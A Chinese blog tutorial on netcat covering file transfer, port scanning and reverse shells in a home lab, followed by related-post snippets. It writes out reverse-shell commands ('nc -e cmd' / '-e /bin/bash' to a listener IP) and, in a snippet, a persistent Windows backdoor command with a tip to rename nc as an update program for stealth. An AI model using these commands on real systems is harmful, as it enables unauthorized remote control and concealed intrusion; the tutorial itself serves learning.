netcat的简单使用(2)

已于 2025-02-27 22:52:03 修改
阅读量719 收藏 12
点赞数 8
文章标签: 网络 web安全 安全
于 2025-02-26 22:38:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_65853019/article/details/145888832
版权

1.文件传输

客户端传数据到服务端:

客户端和服务端可以通过netcat进行数据传输。原理、步骤如下:

在netcat文件夹中新建文件input.txt,并写入内容

 在netcat-win32-1.12目录下打开两个对话框(一个作为客户端,一个作为服务端),输入如下命令:(上面为服务端,下面为客户端),nc64 -lp 5566 >output.txt表示为可以将接收到的数据自动创建文件并写入该文件中,nc64.exe 127.0.0.1 5566 <input.txt表示为将刚才写好的客户端的数据传输给服务端。(写nc64.exe或者nc.exe,这个命令看你netcat文件夹里面有哪个,就写哪个)

发送后服务端接收数据,并自动创建文件,将内容写入文件中,效果如下:

服务端传数据到客户端:

在服务端该目录下创建文件并写入要传送到客户端的数据,如图:

打开命令窗口(创建两个对话框,上面是服务端,下面是客户端),nc64.exe -lp 5566 <reinput.txt表示将服务端的数据传输给客户端,nc64.exe 127.0.0.1 5566 >reoutput.txt表示将接收到的数据写入自动创建的文件里。

运行结束后,效果如图:

2.信息探测

可以进行端口的扫描

-n:表示IP
-v:显示执行命令过程
-w:设置超时时间
-z:不进行交互,直接显示结果
可以使用命令nc -n -v -w1 -z 192.168.79.125 1-1000
后面为扫描主机的IP地址,以及端口范围

也可以使用echo " " |nc -n -v -w1 192.168.35.154 1-1000输出端口内容。

可以在kali中进行尝试,扫描其他主机的端口情况。

3.反弹Shell

正向shell可以从前面发布的《netcat简单使用》中理解,即客户端控制服务端。而反弹shell刚好相反,即服务端控制客户端。下列可以简单描述一下其简单步骤和命令:

模拟环境①:将物理机作为服务端,将windows虚拟机作为客户端(其他情况也可以)

在物理机和虚拟机都要安装netcat才能使用命令。物理机打开netcat的目录,打开命令窗口后键入nc64.exe -lvp 5566,表示开启监听端口。虚拟机打开netcat目录并打开命令窗口后键入nc64.exe -e cmd 192.168.24.1 5566,后面的地址写物理机的IP地址,表示重定向到cmd命令并且连接物理机(服务端),运行后,物理机(服务端)就可以控制虚拟机(客户端),此时服务端就可以输入命令,例如ipconfig去查询客户端的IP地址等等。

模拟环境②:将物理机作为服务端,将Linux虚拟机作为客户端(跟上面原理一样)

物理机(服务端)命令:nc64.exe -lvp 5566   意为开启监听端口

虚拟机(客户端)命令:nc64.exe -e /bin/bash 192.168.24.1 5566   表示重定向到bash命令并连接主机地址,后面的地址写物理机地址,从而实现服务端控制客户端的效果。

sszdlbw
关注
Windows 环境下 netcat 的安装与使用
qq_40359932的博客
04-29 5580
1、下载 下载路径:https://eternallybored.org/misc/netcat/ 2、解压 选择一个合适的路径,解压文件。 方式一: 将文件夹中的所有内容复制到C:\Windows\System32的文件夹下,即可直接使用。(跳过第三步:配置环境变量) 方式二: 放在自定义的位置中,需要配置环境变量。 3、配置环境变量 新建一个环境变量,变量名自定义,变量值为n......
netcat工具简单使用
W2398439780的博客
11-07 666
2)在 job 文件夹下创建 Flume Agent 配置文件 flume-netcat-logger.conf。创建 Flume Agent 配置文件 flume-netcat-logger.conf。(3)在 flume-netcat-logger.conf 文件中添加如下内容。(1)在 flume 目录下创建 job 文件夹并进入 job 文件夹。在 /opt/software目录下安装netcat。判断 44444 端口是否被占用。nc -lk 加上端口号。然后就可以互相收发消息了。
Linux netcat(CMD: nc) 基本使用
秦王的弓
09-02 2228
一、版本 通常的Linux发行版中都带有NetCat(简称nc),甚至在拯救模式光盘中也由busybox提供了 简版的nc工具。但不同的版本,其参数的使用略有差异。 NetCat 官方地址:http://netcat.sourceforge.net/ 引用 [root@h
Windows环境下netcat的安装与使用
m0_64450656的博客
12-12 3270
Netcat(简称nc)是一款功能强大的网络工具,它被广泛用于网络调试和分析。Netcat最初由Hobbit(Hector Marcelo Federico Perez)在1996年编写,因其功能多样和易于使用而闻名。
Netcat(nc)工具使用
最新发布
rufeike的博客
04-15 992
Netcat(简称 nc)是一个功能强大的 命令行网络工具,被称为 “网络瑞士军刀”,支持 TCP/UDP 协议,可用于 端口扫描、数据传输、端口监听、代理转发、反弹 Shell 等多种用途。几乎所有 Linux 发行版都支持,是网络管理员、渗透测试人员和开发者的必备工具。
windowsnetcat使用
编程者说的博客专栏
09-01 2784
nc在linux下非常方便,当然windows下开发是,我们也可以使用, 一、下载 https://eternallybored.org/misc/netcat/ 二、配置 配置环境变量,(网上有很多是把exe文件copy到c盘,个人不太喜欢这种方式,所以配置了环境变量) 三、使用 cmd,输入nc -h,出现如下,则配置成功。 ...
netcat 使用方法
babytiger的专栏
07-07 1436
linux 安装方法apt-get install netcat-traditionalapt install netcat-openbsdwindows下载netcat 1.11 for Win32/Win64将里面的exe复制到C:\Windows\System32v 参数就是列出执行过程的详细信息,n 参数翻译过来就是只接收 ip 地址,没有 dns。之所以使用 n 参数,是因为使用命令的过程中只去传入 ip,减少了 nc 把域名解析为 ip 的过程,这样可以节省时间提高效率。实际上nc就是socke
netcat用法
fa1lr4in的小博客
10-08 728
一、在win下开放cmd后门 在终端下的命令: nc.exe -l -p 4455 -d -e cmd.exe 上述命令只能依托于命令行运行,我们可以吧-l 参数换成 -L(-L只能在win下才能使用) nc.exe -L -p 4455 -d -e cmd.exe 可以把nc程序重命名为升级程序,增加隐蔽性 move nc.exe c:\Windows\System32\D...
netcat使用教程
weixin_46041960的博客
07-12 3785
软件准备: windows:访问https://eternallybored.org/misc/netcat/
windows下的netcat
11-24
windows下的netcat
NetCat使用精粹
12-14
6. 聊天:NetCat 还可以作为简单的字符下聊天工具使用。例如,server2 上需要启动监听,然后 server1 上可以使用 nc 连接过去进行聊天。 需要注意的是,在使用 NetCat 之前,建议先查看帮助文档,以了解不同的版本...
netcat 瑞士军刀 linux windows netcat 瑞士军刀 linux windows
04-15
本软件包含windows和linux两种版本 1、 了解NC的用法 命令:   nc –h 技巧:   win98用户可以在autoexec.bat加入path=nc的路径,win2000用户在环境变量中加入path中,linux含有这个命令(redhat) 1、基本使用   想要连接到某处: nc [-options] hostname port[s] [ports] ...   绑定端口等待连接: nc -l -p port [-options] [hostname] [port]   参数:   -e prog 程序重定向,一旦连接,就执行 [危险!!]   -g gateway source-routing hop point[s], up to 8   -G num source-routing pointer: 4, 8, 12, ...   -h 帮助信息   -i secs 延时的间隔   -l 监听模式,用于入站连接   -n 指定数字的IP地址,不能用hostname   -o file 记录16进制的传输   -p port 本地端口号   -r 任意指定本地及远程端口   -s addr 本地源地址   -u UDP模式   -v 详细输出——用两个-v可得到更详细的内容   -w secs timeout的时间   -z 将输入输出关掉——用于扫描时   其中端口号可以指定一个或者用lo-hi式的指定范围。   例如:扫描端口   tcp扫描   C:\nc>nc -v -z -w2 192.168.0.80 1-140   net [192.168.0.80] 140 (?)   net [192.168.0.80] 139 (netbios-ssn) open   net [192.168.0.80] 138 (?)   net [192.168.0.80] 137 (netbios-ns)   net [192.168.0.80] 136 (?)   net [192.168.0.80] 135 (epmap) open   net [192.168.0.80] 81 (?) open   net [192.168.0.80] 80 (http) open   net [192.168.0.80] 79 (finger)   net [192.168.0.80] 25 (smtp) open   net [192.168.0.80] 24 (?)   net [192.168.0.80] 23 (telnet)   net [192.168.0.80] 21 (ftp)   udp扫描   C:\nc>nc -u -v -z -w2 192.168.0.80 1-140   net [192.168.0.80] 140 (?) open   net [192.168.0.80] 139 (?) open   net [192.168.0.80] 138 (netbios-dgm) open   net [192.168.0.80] 137 (netbios-ns) open   net [192.168.0.80] 54 (?) open   net [192.168.0.80] 53 (domain) open   net [192.168.0.80] 38 (?) open   net [192.168.0.80] 37 (time) open   net [192.168.0.80] 7 (echo) open 2、高级应用   1.Window用法:   (1)IE的MIME欺骗   www.try2hack..nl(是一个让初学黑客技术的人去做实验的站点)   打开这个页面,有http://www.try2hack/cgi-bin/level7页面(这个网站提供了黑客的8关,过了这8关证明你开始入门了),这个页面告诉我们的浏览器不是 IE6.72,我们的操作系统不是LIUNX,我们不是从www.microsoft/ms重定向链接过去的,有病阿(这是一个题目呀,要慢慢研究),linux有IE6.72? 微软会在它的页面上放的链接?看看页面的源代码,是在服务器端 执行的perl脚本,根本无法看到,还是研究一下IE5和它通信时都告诉了它什么,抓包,我们会发现,我们的IE5告诉对方: 我是MSIE 5.0; Windows NT 5.0; .NET CLR 1.0.3705。。。。哈哈,这个cgi应该是根据这些信息知道我们不是它要求的 客户,嘿嘿,需要欺骗对方才行,用军刀来可以实现,如下做就可
netcat for windows
07-11
现在这个都不好找了 还是挺有用处的。 好不容易找到一个。
通过 端口 设置,客户端 执行 服务端 运行程序 cmd netcat-1.11使用一例
01-06
在这个例子中,netcat-1.11(通常简称为nc)被用作一个简单的TCP/IP工具,允许客户端通过指定的端口向服务器端发送命令,并接收执行结果。 Netcat是一款功能强大的网络安全工具,常用于端口扫描、数据传输、反向...
Netcat安装使用详解
Zlirving_的博客
07-06 1660
Netcat网络的一段读取数据,输出到网络的另一端(可以使用于TCP和UDP协议)   安装 Windows可自行在github上下载netcat kali linux上 方法一: sudo yum install nc.x86_64 方法二: wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz tar z
Linux上安装NetCat简单使用
weixin_46122692的博客
10-23 2381
一、介绍: netcat是一个通过TCP/UDP在网络中进行读写数据工具(命令),被称为“瑞士军刀”,主要用于调试领域、传输领域甚至黑客攻击领域。利用该工具,可以将网络中一端的数据完整的发送至另一台主机终端显示或存储,常见的应用为文件传输、与好友即时通信、传输流媒体或者作为用来验证服务器的独立的客户端。当然,也可以在脚本中使用该工具。 二、Linux上安装: 第一种方式: yum -y install nc yum remove nmap-ncat.x86_64(删除) 第二种方式: 下载rp
科普:WindowsNetcat使用手册
热门推荐
sdujava2011
07-20 4万+
本文转自https://www.91ri.org/7761.html,稍作修改,所有权力归原作者所有。 简介: 在网络工具中有“瑞士军刀”美誉的NetCat(以下简称nc),在我们用了N年了至今仍是爱不释手。因为它短小精悍(这个用在它身上很适合,现在有人已经将其修改成大约10K左右,而且功能不减少)。 参数格式 连接到某处: nc [-options] hostnam
windows下安装使用netcat
wokoone的博客
11-02 4507
windows下安装使用netcat
windows使用nc(netcat)命令
qq_46359227的博客
05-08 9674
下载后解压到你指定位置【如:C:\software\nc\nc.exe】然后在系统环境里找名叫PATH的变量,双击然后点 确定----确定----确定 即可。
Centos7上netcat如何使用
01-21
利用 Netcat 实现简单的文件发送接收过程也很容易实现。假设 A 和 B 分别代表两台计算机之间的一方;A 启动监听准备接受数据包的同时指定了待存储路径名;而B则负责提供欲传送对象的具体位置以及对方地址加端口组合...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值